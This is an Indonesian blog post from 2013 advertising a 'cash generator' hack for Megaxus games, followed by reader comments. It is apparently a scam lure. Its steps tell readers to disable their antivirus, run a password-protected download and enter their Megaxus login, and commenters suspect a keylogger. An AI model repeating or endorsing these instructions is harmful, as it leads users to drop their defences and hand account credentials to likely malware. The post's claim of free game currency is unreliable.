Selasa, 01 Januari 2013

Cheat Hacks Cash Megaxus ( All Game Megaxus )

New Hacks Cash Megaxus ( Generator )

Gak Percaya ... ?? Check Virtot : Click_Here
Masih Kgak Percaya ,,,,,, ?? Virtot Ulang Lagi


Tutorial Pengunaan Cheat ! Agar Tidak Di Benned ! ...

VIA TULISAN :
[-] Pertama Sebelum Mendownload Ni Cheat Perhatikan Dolo  Antivirus ... ! Antivirus Mu harus dimatikan sebelum mendownload cheat karena sebagian besar antivirus mengganggap cheat itu adalah VIRUS !
[-] Setelah Didownload buka lalu Masukan Passwordnya ! ( PASSWORDNYA : "iamhackingmaster" ) tanpa tanda petik
[-] Setelah itu login dan  buka bill.megaxus.co.id lalu login dengan ID password megaxus mu
[-] Jika sudah lihat cash generatornya , lalu tuliskan cash yang kamu inginkan ( minimal 100rb kalo lebih di benned 100% ditempat )
[-] Jika sudah ditulis tekan Hacks Cash Generator dan succes
[-] Jika sudah sukses coba lihat di bill.megaxus.co.id cash mu ! jika tidak berhasil ulangi lagi 2 x

NB : hack cash ini hanya boleh di lakukan 2 x dalam sehari !

Download Hack  " Click_Here

VIA VIDEo
[-] Video1
[-] Video2

20 komentar:

  1. gan gak bisa
    udah gua ikuti tutor nya tetep gk bisa

    BalasHapus
  2. di virtot CAT-QuickHeal = (Suspicious) - DNAScan

    BalasHapus
  3. cara matiin antivirus nya gi mana gan !!!

    BalasHapus
  4. kalian bodoh.. kenapa mesti di mati'in anti virusnya? aku tau anti virus harus di matikan.. agar di saat kalian membuka generatornya itu tidak terdeteksi KEYLOGGER. PERCAYA PADA BADIKASNO, karena badikasno mengerti semua hal berhubungan dengan anti virus bahkan program" yang membahayakan AKUN.

    BalasHapus
  5. kok saat saya pencet link download, ga bisa di download?

    BalasHapus
  6. upload lagi kang filenya...

    BalasHapus
  7. gan kok ngga ad sih berkas tidak ad atau di hapus

    BalasHapus
  8. eh teman2,,jangan mudah percaya itu generator tidak perlu harus mamatikan anti virus,,jika kalian matikan anti virusnya aku yakin pasti keylogernya tidak terdeteksi,,

    BalasHapus
  9. filenya napa di delete bro ? Upload lagi dong butuh nih

    BalasHapus
  10. download nya kok mesti download Ilvide

    BalasHapus